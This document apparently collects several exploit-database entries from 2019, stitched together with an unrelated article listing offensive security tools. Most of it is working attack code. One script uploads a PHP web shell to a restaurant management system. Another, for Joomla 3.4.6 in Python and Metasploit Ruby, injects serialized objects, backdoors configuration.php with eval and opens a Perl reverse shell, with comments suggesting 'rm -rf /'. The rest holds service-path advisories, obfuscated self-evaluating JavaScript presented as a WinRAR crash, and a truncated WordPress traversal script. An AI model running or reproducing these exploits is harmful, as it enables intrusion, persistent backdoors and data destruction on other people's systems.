# Exploit Title: Restaurant Management System 1.0 - Remote Code Execution # Date: 2019-10-16 # Exploit Author: Ibad Shah # Vendor Homepage: https://www.sourcecodester.com/users/lewa # Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html # Version: N/A # Tested on: Apache 2.4.41 #!/usr/bin/python import requests import sys print (""" _ _ _____ __ __ _____ ______ _ _ _ _| || |_| __ \| \/ |/ ____| | ____| | | (_) | |_ __ _| |__) | \ / | (___ | |__ __ ___ __ | | ___ _| |_ _| || |_| _ /| |\/| |\___ \ | __| \ \/ / '_ \| |/ _ \| | __| |_ __ _| | \ \| | | |____) | | |____ > <| |_) | | (_) | | |_ |_||_| |_| \_\_| |_|_____/ |______/_/\_\ .__/|_|\___/|_|\__| | | |_| """) print ("Credits : All InfoSec (Raja Ji's) Group") url = sys.argv[1] if len(sys.argv[1]) < 8: print("[+] Usage : python rms-rce.py http://localhost:80/") exit() print ("[+] Restaurant Management System Exploit, Uploading Shell") target = url+"admin/foods-exec.php" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Length": "327", "Content-Type": "multipart/form-data; boundary=---------------------------191691572411478", "Connection": "close", "Referer": "http://localhost:8081/rms/admin/foods.php", "Cookie": "PHPSESSID=4dmIn4q1pvs4b79", "Upgrade-Insecure-Requests": "1" } data = """ -----------------------------191691572411478 Content-Disposition: form-data; name="photo"; filename="reverse-shell.php" Content-Type: text/html <?php echo shell_exec($_GET["cmd"]); ?> -----------------------------191691572411478 Content-Disposition: form-data; name="Submit" Add -----------------------------191691572411478-- """ r = requests.post(target,verify=False, headers=headers,data=data, proxies={"http":"http://127.0.0.1:8080"}) print("[+] Shell Uploaded. Please check the URL : "+url+"images/reverse-shell.php")

# Exploit Title: BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path # Exploit Author: Debashis Pal # Date: 2019-10-17 # Vendor : Blackmoonftpserver # Source: http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server # Version: BlackMoon FTP Server 3.1.2.1731 # CVE : N/A # Tested on: Windows 7 SP1(64bit), Windows 7 SP1(32bit) 1. Description: Unquoted service paths in BlackMoon FTP Server versions 3.1.2.1731 'BMFTP-RELEASE' have an unquoted service path. 2. PoC: C:\>sc qc BMFTP-RELEASE sc qc BMFTP-RELEASE [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BMFTP-RELEASE TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Selom Ofori\BlackMoon FTP Server\FTPService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BlackMoon FTP Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem 3. Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path # Date : 2019-10-15 # Exploit Author : Cakes # Vendor: Softalk # Version : 7.5.1 # Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3 # Tested on Windows 10 # CVE : N/A c:\>sc qc WorkgroupMail [SC] QueryServiceConfig SUCCESS SERVICE_NAME: WorkgroupMail TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\WorkgroupMail\wmsvc.exe -s LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : WorkgroupMail DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: winrar 5.80 64bit - Denial of Service # Date: 2019-10-19 # Exploit Author: alblalawi # Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe # Version: 5.80 # Tested on: Microsoft Windows Version 10.0.18362.418 64bit # 1- open winrar or any file.rar # 2- help # 3- help topics # 4- Drag the exploit to the window # Save the content html <script type="text/javascript"> //<![CDATA[ <!-- var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" + "harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+ "\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" + "e(x.charCodeAt(i)^(y++));}return o;}f(\\\"\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\"+ "\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh" + "83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\"+ "\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\"+ "\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02" + "5\\\\\\\\025\\\\\\\\010\\\\\\\\030\\\\\\\\020t<^!M@;?T+4W~Q`3}tfr4}bch4\\\\" + "\\\\177jith\\\\\\\\\\\"\\\\|\\\\\\\\003g[TLTB[u\\\\\\\\010\\\\\\\\013OB@[U_" + "F\\\\\\\\016h\\\\\\\\027\\\\\\\\033\\\\\\\\006d\\\\\\\\033\\\\\\\\004gNaP\\" + "\\\\\\003\\\\\\\\\\\"\\\\.&:z\\\\\\\\0314\\\\\\\\033&u9(>$>;p=3=3 70=d\\\\\\"+ "\\006y\\\\\\\\n\\\\\\\\037\\\\\\\\r<\\\\\\\\022\\\\\\\\010\\\\\\\\022\\\\\\" + "\\027J \\\\\\\\010\\\\\\\\004\\\\\\\\007\\\\\\\\r\\\\\\\\0177NS2\\\\\\\\035" + ",\\\\\\\\037.\\\\\\\\001(\\\\\\\\033VWX=\\\\\\\\023\\\\\\\\026\\\\\\\\\\\\\\"+ "\\\\\\\\\\016\\\\\\\\026l!\\\\\\\\\\\"\\\\_vYh'()Ynx-}g|1/3Wgsvl|Uyvx}k\\\\" + "\\\\010}\\\\\\\\000tWFTNX]\\\\\\\\004xDHBCl\\\\\\\\023\\\\\\\\033\\\\\\\\02" + "3\\\\\\\\024iDkV\\\\\\\\031\\\\\\\\032\\\\\\\\033\\\\\\\\177\\\\\\\\\\\\\\\\"+ "RS`2*/j\\\\\\\\0273)`\\\\\\\\025h\\\\\\\\027n\\\\\\\\021l,=5|6,0\\\\\\\\nu\\"+ "\\\\\\004{\\\\\\\\006yu}~\\\\\\\\003\\\\\\\\022=\\\\\\\\014CDE5\\\\\\\\002\\"+ "\\\\\\034I\\\\\\\\031\\\\\\\\003\\\\\\\\000MSO>\\\\\\\\036\\\\\\\\006\\\\\\" + "\\033\\\\\\\\035\\\\\\\\033\\\\\\\\021WXYZ'\\\\\\\\016!\\\\\\\\020 !\\\\\\\\"+ "\\\"\\\\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\\\\\\\017IVNH\\\\\\\\033\\\\\\\\004\\"+ "\\\\\\016\\\\\\\\023\\\\\\\\031\\\\\\\\021\\\"\\\\,28)\\\"(f};)lo,0(rtsbus." + "o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" + "=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\""+ ")" ; while(x=eval(x)); //--> //]]> </script> <script type="text/javascript"> //<![CDATA[ <!-- var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" + "=48){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" + ".substr(0,ol);}f(\")19,\\\"ZPdw771\\\\b77-0xjk-7=3771\\\\sp,cw$520\\\\:330\\"+ "\\xg030\\\\jj9%530\\\\b000\\\\XZUUVX620\\\\LP\\\\\\\\Pr\\\\610\\\\KOHD400\\" + "\\620\\\\720\\\\\\\\\\\\WOWGPr\\\\530\\\\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" + "30\\\\t\\\\ 520\\\\&310\\\\$n\\\\200\\\\)230\\\\/000\\\\-K530\\\\310\\\\310" + "\\\\n\\\\630\\\\010\\\\IULFW620\\\\600\\\\400\\\\700\\\\520\\\\=*100\\\\(70" + "0\\\\4500\\\\*310\\\\-u}xy8pt~}|{771\\\\itg/e771\\\\sb|`V620\\\\530\\\\NT\\" + "\\\\\\MdYjGh010\\\\@TVI[O410\\\\620\\\\n\\\\330\\\\ZB@CQA200\\\\SAijArGhEec" + "J{HaN*2S?9t)V)5,&waedtbn\\\\!010\\\\'420\\\\%n\\\\+r\\\\U]XY030\\\\PT^]\\\\" + "\\\\[ZY]GZEr\\\\CYQ@b~4|);/pw$:2'610\\\\?410\\\\=220\\\\vn720\\\\h520\\\\hz" + "f7!%$4\\\"\\\\730\\\\L\\\\\\\\JOfWdEjN420\\\\230\\\\230\\\\IU710\\\\@BE_IG]" + "AHyV771\\\\430\\\\300\\\\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\\\\\\\410\\\\!B7" + "30\\\\330\\\\430\\\\020\\\\K030\\\\)600\\\\/L530\\\\530\\\\330\\\\600\\\\QN" + "C400\\\\500\\\\r\\\\320\\\\710\\\\720\\\\320\\\\M620\\\\710\\\\500\\\\2+>3?" + "\\\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" + ";l<i;0=i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")" ; while(x=eval(x)); //--> //]]> </script>

If you want to do a good job, you must first sharpen your tools. For new friends who are new to network security. You must have some understanding of these tools. In this article, let’s briefly talk about these network security tools! Web Security Class The web-class tools mainly use various scanning tools to discover various vulnerabilities in web sites such as sql injection, xss, etc. Therefore, obtain system permissions, commonly used tools include 01 Nmap nmap is the first tool we use. Using this tool, we can scan the corresponding IP of the site, the information of the ports, services, operating systems, etc. that have been opened. It can also be used as a vulnerability scanning, brute force cracking, fingerprint recognition, fingerprint recognition, etc. 02 dirsearch Scan the main user site directory. By scanning the site administrator background, backup files, and the site's directory structure that we can obtain. Similar tools include Gobuster DIRB Wfuzz, etc. Each tool has its own strengths, but the principles are similar. 03 dnsmap dnsmap is a subdomain name collection tool. When the main site does not find a vulnerability, we can also get the directory through the vulnerability on the side site. There are many such limited tools, such as Layer subdomain excavator. 04 web vulnerability scan Web vulnerability scanning tools are blooming. The most famous tools are Nessus appscan awvs owasp zap xray and so on. Let me give you a brief introduction. NessusNessus is the most used system vulnerability scanning and analysis software in the world. It has very powerful functions, divided into ordinary and professional versions. After entering the target, you can scan for vulnerabilities with one click. The input results are intuitive and clear. appscanAppScan uses a powerful scanning engine to automatically crawl target applications and test vulnerabilities. Test results are prioritized and presented in a way that allows operators to quickly classify problems and dig deep into the most critical vulnerabilities found. Reference article 《WEB漏洞扫描工具HCL AppScan Standard》 owasp zapOWASP ZAP, full name: OWASP Zed Attack Proxy attack proxy server is one of the most popular free security tools in the world. ZAP can help us automatically discover security vulnerabilities in web applications during the development and testing of applications. In addition, it is also an excellent tool for artificial safety testing for experienced penetration testers.xrayxray is a powerful security assessment tool, created by many experienced front-line security practitioners. The main feature is that : is fast detection speed. Fast packet transmission speed; high efficiency of vulnerability detection algorithm. Wide support range. From OWASP Top 10 general vulnerability detection to various CMS framework POCs, it can be supported. It can also be linked with Burp. Double damage is the most deadly. 05 sqlmap sqlmap is an automated SQL injection tool. Its main function is to scan, discover and exploit SQL injection vulnerabilities for a given URL. It is one of the must-have tools for cybersecurity enthusiasts. 06 Burpsuite Burp Suite is a graphical tool for testing the security of web applications. In web testing, this tool is commonly used to scan vulnerability, analyze packets, modify packages, and brute-force cracking. It is a very important tool. At this point, the commonly used tools in web security will introduce to you here. Of course, in addition to the above tools, there are many other excellent tools, but due to limited time and energy, I will not list them one by one. System Security System security mainly includes scanning of operating system vulnerabilities such as Windows Linux, ssh ftp password cracking, etc. Common tools are as follows: 07 Metasploit msfconsole, referred to as msf, is a commonly used penetration testing tool, which includes common vulnerability exploit modules and generation of various Trojans. It is a must-have tool for cybersecurity enthusiasts. 08 Cobalt Strike Cobalt Strike can be understood as a visual Metasploit. It is a penetration testing tool developed by Red Team in the United States, and is often called CS by industry giants. 09 Goby Goby is a new network security testing tool created by Zwell (author of Pangolin, JSky, FOFA). It can sort out the most comprehensive attack surface information for a target enterprise, while also conducting efficient and practical vulnerability scanning. 10 Yakit It is a highly integrated security testing platform. It also contains many functions such as port scanning, brute force cracking, rich plug-ins, packet interception and modification, and other conventional functions. ha WiFi Security Class 11 hashcat One of the most popular, fastest and most professional password recovery tools in hashcat. It supports 5 unique attack modes and is suitable for over 300 highly optimized hashing algorithms. It can support CPUs, GPUs and more hardware accelerators and helps with distributed password cracking. 12 John John can be simply understood as an offline version of hash cracking tool. Supports system passwords, PDF files, ZIP, RAR, wifi passwords, etc. 13 Medusa A common password cracking tool with weaker capabilities than the previous two, but it supports more protocols. For example, SMB, HTTP, POP3, MSSQL, SSH, etc. 14 Mimikatz is mainly used to extract passwords, PINs, hash codes and Kerberos tickets from Windows host memory and save them in plain text files. WIFI security class 15 aircrack-ng kit airmon-ng He is a kit, different kits have different homework. For example, use airodump-ng to crack using aircrack-ng for scanning WiFi. The most basic and introductory WiFi password recovery tool. 16 wifite Fool-style one-click WiFi cracking tool. I am unwilling to accept the autocracy. 17 fluxion The most classic WiFi fishing tool. The same type of tool also has airgeddon Man in the middle attack 18 Wireshark Wireshark is the world's top and widely used network protocol analysis tool. Using this tool, we can capture data packet information, and can also capture account, password, picture, chat history and other information in the http protocol. 19 ettercap Ettercap is the most commonly used middleman tool. It should be noted that due to the updates of various protocols, many of the functions of ettercap can no longer be played. But it can still be played in the LAN. 20 Social Engineering Tools I won’t say much, set is the most awesome. However, every time the dependent environment is started, various errors are reported, but it does not affect the use.

# Exploit Title: Joomla! 3.4.6 - Remote Code Execution # Google Dork: N/A # Date: 2019-10-02 # Exploit Author: Alessandro Groppo # Vendor Homepage: https//www.joomla.it/ # Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 # Version: 3.0.0 --> 3.4.6 # Tested on: Linux # CVE : N/A # Technical details: https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41 # Github: https://github.com/kiks7/rusty_joomla_rce # # The exploitation is implanting a backdoor in /configuration.php file in the root directory with an eval in order to be more suitable for all environments, but it is also more intrusive. # If you don't like this way, you can replace the get_backdoor_pay() with get_pay('php_function', 'parameter') like get_pay('system','rm -rf /') #!/usr/bin/env python3 import requests from bs4 import BeautifulSoup import sys import string import random import argparse from termcolor import colored PROXS = {'http':'127.0.0.1:8080'} PROXS = {} def random_string(stringLength): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(stringLength)) backdoor_param = random_string(50) def print_info(str): print(colored("[*] " + str,"cyan")) def print_ok(str): print(colored("[+] "+ str,"green")) def print_error(str): print(colored("[-] "+ str,"red")) def print_warning(str): print(colored("[!!] " + str,"yellow")) def get_token(url, cook): token = '' resp = requests.get(url, cookies=cook, proxies = PROXS) html = BeautifulSoup(resp.text,'html.parser') # csrf token is the last input for v in html.find_all('input'): csrf = v csrf = csrf.get('name') return csrf def get_error(url, cook): resp = requests.get(url, cookies = cook, proxies = PROXS) if 'Failed to decode session object' in resp.text: #print(resp.text) return False #print(resp.text) return True def get_cook(url): resp = requests.get(url, proxies=PROXS) #print(resp.cookies) return resp.cookies def gen_pay(function, command): # Generate the payload for call_user_func('FUNCTION','COMMAND') template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' #payload = command + ' || $a=\'http://wtf\';' payload = 'http://l4m3rz.l337/;' + command # Following payload will append an eval() at the enabled of the configuration file #payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';' function_len = len(function) final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function))) return final def make_req(url , object_payload): # just make a req with object print_info('Getting Session Cookie ..') cook = get_cook(url) print_info('Getting CSRF Token ..') csrf = get_token( url, cook) user_payload = '\\0\\0\\0' * 9 padding = 'AAA' # It will land at this padding working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}' clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects inj_object = '";' inj_object += object_payload inj_object += 's:6:"return";s:102:' # end the object with the 'return' part password_payload = padding + inj_object params = { 'username': user_payload, 'password': password_payload, 'option':'com_users', 'task':'user.login', csrf :'1' } print_info('Sending request ..') resp = requests.post(url, proxies = PROXS, cookies = cook,data=params) return resp.text def get_backdoor_pay(): # This payload will backdoor the the configuration .PHP with an eval on POST request function = 'assert' template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' # payload = command + ' || $a=\'http://wtf\';' # Following payload will append an eval() at the enabled of the configuration file payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';' function_len = len(function) final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function))) return final def check(url): check_string = random_string(20) target_url = url + 'index.php/component/users' html = make_req(url, gen_pay('print_r',check_string)) if check_string in html: return True else: return False def ping_backdoor(url,param_name): res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS) if 'PWNED' in res.text: return True return False def execute_backdoor(url, payload_code): # Execute PHP code from the backdoor res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS) print(res.text) def exploit(url, lhost, lport): # Exploit the target # Default exploitation will append en eval function at the end of the configuration.pphp # as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters') # e.g. get_payload('system','rm -rf /') # First check that the backdoor has not been already implanted target_url = url + 'index.php/component/users' make_req(target_url, get_backdoor_pay()) if ping_backdoor(url, backdoor_param): print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param) print_info('Now it\'s time to reverse, trying with a system + perl') execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-t','--target',required=True,help='Joomla Target') parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only') parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit') parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP') parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port') args = vars(parser.parse_args()) url = args['target'] if(check(url)): print_ok('Vulnerable') if args['exploit']: exploit(url, args['lhost'], args['lport']) else: print_info('Use --exploit to exploit it') else: print_error('Seems NOT Vulnerable ;/') metasploit_rusty_joomla_rce.rb ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Joomla def initialize(info = {}) super(update_info(info, 'Name' => 'Rusty Joomla Unauthenticated Remote Code Execution', 'Description' => %q{ PHP Object Injection because of a downsize in the read/write process with the database leads to RCE. The exploit will backdoor the configuration.php file in the root directory with en eval of a POST parameter. That's because the exploit is more reliabale (doesn't rely on common disabled function). For this reason, use it with caution and remember the house cleaning. Btw, you can also edit this exploit and use whatever payload you want. just modify the exploit object with get_payload('you_php_function','your_parameters'), e.g. get_payload('system','rm -rf /') and enjoy }, 'Author' => [ 'Alessandro \'kiks\' Groppo @Hacktive Security', ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41'] ], 'Privileged' => false, 'Platform' => 'PHP', 'Arch' => ARCH_PHP, 'Targets' => [['Joomla 3.0.0 - 3.4.6', {}]], 'DisclosureDate' => 'Oct 02 2019', 'DefaultTarget' => 0) ) register_advanced_options( [ OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]), ]) end def get_random_string(length=50) source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a key="" length.times{ key += source[rand(source.size)].to_s } return key end def get_session_token # Get session token from cookies vprint_status('Getting Session Token') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) cook = res.headers['Set-Cookie'].split(';')[0] vprint_status('Session cookie: ' + cook) return cook end def get_csrf_token(sess_cookie) vprint_status('Getting CSRF Token') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'/index.php/component/users'), 'headers' => { 'Cookie' => sess_cookie, } }) html = res.get_html_document input_field = html.at('//form').xpath('//input')[-1] token = input_field.to_s.split(' ')[2] token = token.gsub('name="','').gsub('"','') if token then vprint_status('CSRF Token: ' + token) return token end print_error('Cannot get the CSRF Token ..') end def get_payload(function, payload) # @function: The PHP Function # @payload: The payload for the call template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' # The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values payload = 'http://l4m3rz.l337/;' + payload final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', function).gsub('FUNC_LEN', function.length.to_s) return final end def get_payload_backdoor(param_name) # return the backdoor payload # or better, the payload that will inject and eval function in configuration.php (in the root) # As said in other part of the code. we cannot create new .php file because we cannot use # the ? character because of the check on URI schema function = 'assert' template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' # This payload will append an eval() at the end of the configuration file payload = "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';" template['PAYLOAD'] = payload template['LENGTH'] = payload.length.to_s template['FUNC_NAME'] = function template['FUNC_LEN'] = function.length.to_s return template end def check_by_exploiting # Check that is vulnerable by exploiting it and try to inject a printr('something') # Get the Session anb CidSRF Tokens sess_token = get_session_token() csrf_token = get_csrf_token(sess_token) print_status('Testing with a POC object payload') username_payload = '\\0\\0\\0' * 9 password_payload = 'AAA";' # close the prev object password_payload += get_payload('print_r','IAMSODAMNVULNERABLE') # actual payload password_payload += 's:6:"return":s:102:' # close cleanly the object res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/index.php/component/users'), 'method' => 'POST', 'headers' => { 'Cookie' => sess_token, }, 'vars_post' => { 'username' => username_payload, 'password' => password_payload, 'option' => 'com_users', 'task' => 'user.login', csrf_token => '1', } }) # Redirect in order to retrieve the output if res.redirection then res_redirect = send_request_cgi({ 'method' => 'GET', 'uri' => res.redirection.to_s, 'headers' =>{ 'Cookie' => sess_token } }) if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? res_redirect.to_s then return true else return false end end end def check # Check if the target is UP and get the current version running by info leak res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')}) unless res print_error("Connection timed out") return Exploit::CheckCode::Unknown end # Parse XML to get the version if res.code == 200 then xml = res.get_xml_document version = xml.at('version').text print_status('Identified version ' + version) if version <= '3.4.6' and version >= '3.0.0' then if check_by_exploiting() return Exploit::CheckCode::Vulnerable else if check_by_exploiting() then # Try the POC 2 times. return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end else return Exploit::CheckCode::Safe end else print_error('Cannot retrieve XML file for the Joomla Version. Try the POC in order to confirm if it\'s vulnerable') if check_by_exploiting() then return Exploit::CheckCode::Vulnerable else if check_by_exploiting() then return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end end end def exploit if check == Exploit::CheckCode::Safe && !datastore['FORCE'] print_error('Target is not vulnerable') return end pwned = false cmd_param_name = get_random_string(50) sess_token = get_session_token() csrf_token = get_csrf_token(sess_token) # In order to avoid problems with disabled functions # We are gonna append an eval() function at the end of the configuration.php file # This will not cause any problem to Joomla and is a good way to execute then PHP directly # cuz assert is toot annoying and with conditions that we have we cannot inject some characters # So we will use 'assert' with file_put_contents to append the string. then create a reverse shell with this backdoor # Oh i forgot, We cannot create a new file because we cannot use the '?' character in order to be interpreted by the web server. # TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file # Use the implanted backdoor to receive a nice little reverse shell with a PHP payload # Implant the backdoor vprint_status('Cooking the exploit ..') username_payload = '\\0\\0\\0' * 9 password_payload = 'AAA";' # close the prev object password_payload += get_payload_backdoor(cmd_param_name) # actual payload password_payload += 's:6:"return":s:102:' # close cleanly the object print_status('Sending exploit ..') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/index.php/component/users'), 'method' => 'POST', 'headers' => { 'Cookie' => sess_token }, 'vars_post' => { 'username' => username_payload, 'password' => password_payload, 'option' => 'com_users', 'task' => 'user.login', csrf_token => '1' } }) print_status('Triggering the exploit ..') if res.redirection then res_redirect = send_request_cgi({ 'method' => 'GET', 'uri' => res.redirection.to_s, 'headers' =>{ 'Cookie' => sess_token } }) end # Ping the backdoor see if everything is ok :/ res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'configuration.php'), 'vars_post' => { cmd_param_name => 'echo \'PWNED\';' } }) if res.to_s.include? 'PWNED' then print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST') pwned = true end if pwned then print_status('Now it\'s time to reverse shell') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'configuration.php'), 'vars_post' => { cmd_param_name => payload.encoded } }) end end end

# Exploit Title: WordPress Arforms 3.7.1 - Directory Traversal # Date: 2019-09-27 # Exploit Author: Ahmad Almorabea # Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt # Software Link: https://www.arformsplugin.com/documentation/changelog/ # Version: 3.7.1 # CVE ID: CVE-2019-16902 #**************Start Notes************** # You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders. # Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet. # Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143. # But maybe in other forms maybe it's different so you have to change it accordingly. # This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on # There is a request file with this Script make sure to put it in the same folder. #**************End Notes**************** #!/usr/bin/env ruby require "net/http" require 'colorize' $host = ARGV[0] || "" $session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad" def start_function () puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow name = STDIN.gets if $host == "" puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red exit end 